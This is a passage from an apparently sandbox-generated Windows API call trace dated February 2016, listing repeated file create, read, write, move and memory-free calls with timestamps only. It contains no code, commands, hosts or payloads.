"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,994", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,994", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,004", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,004", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,014", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,014", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,024", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,024", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,034", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,034", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,044", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,054", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,054", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,054", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,064", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,064", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,074", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,074", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,084", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,084", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,084", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,094", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,094", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,104", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,104", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,114", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,114", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,124", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,124", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,124", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,134", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,134", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,144", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,144", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,154", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,154", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,154", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,154", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,154", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,174", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,174", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,184", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,184", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,184", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,194", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,194", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,204", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,204", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,204", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,204", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,204", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,204", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,214", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,224", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,234", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,244", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,254", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,254", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,264", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,264", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,264", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,274", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,274", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,284", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,284", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,294", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,294", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,304", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,304", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,304", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,304", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,314", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,314", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,324", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:43,324", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,324", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:43,334", "api": "NtWriteFile"}, 